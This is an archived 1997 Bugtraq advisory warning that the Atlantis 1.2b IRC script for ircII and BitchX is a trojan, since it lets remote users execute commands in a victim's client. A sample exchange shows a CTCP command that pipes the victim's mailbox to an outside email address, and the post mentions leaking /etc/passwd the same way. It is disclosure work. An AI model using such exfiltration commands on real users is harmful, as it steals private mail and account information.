Bugtraq mailing list archives
IRC script trojan with Unix based clients
From: bugtraq () LICJ SOROSCJ RO (Lista de securitate)
Date: Sat, 31 May 1997 01:03:21 +0300
This is a very strange trojan which affects Unix users (other OS-es may be affected as well) which use ircII or BitchX to link to irc servers. And in my country many system administrators do this. It was presented on the irc as amusement (how to kick off a listop with no access rights) but it may have more serious consequences. Some versions of a very popular (at least in romania) irc script (Atlantis) are trojan horses which implement new ctcp commands which allow other people on the irc world to execute irc commands in your client INCLUDING /DCC SEND AND /EXEC (if the client supports them) Atlantis 1.2b is the best known version of the script and if used under ircII (Unix version, Linux tested) The user using these two can have the mail read by others. Sample ircII prompt; noob victim, feur intruder: <feur> /ctcp noob version **** CTCP VERSION reply from noob: [AtlantiS(v1.2b)] by Dethnite <feur> /ctcp noob jupe exec cat $MAIL | mail raf () licj soroscj ro in a similar way /etc/passwd can be sent, allowing the intruder to obtain information about the users on the system. other atlantis versions seem to be affected as well. The only version that is clean is version 1.1. The BitchX client also "supports" the trojan. -- Radu-Adrian Feurdean raf () licj soroscj ro
Current thread:
- IRC script trojan with Unix based clients Lista de securitate (May 30)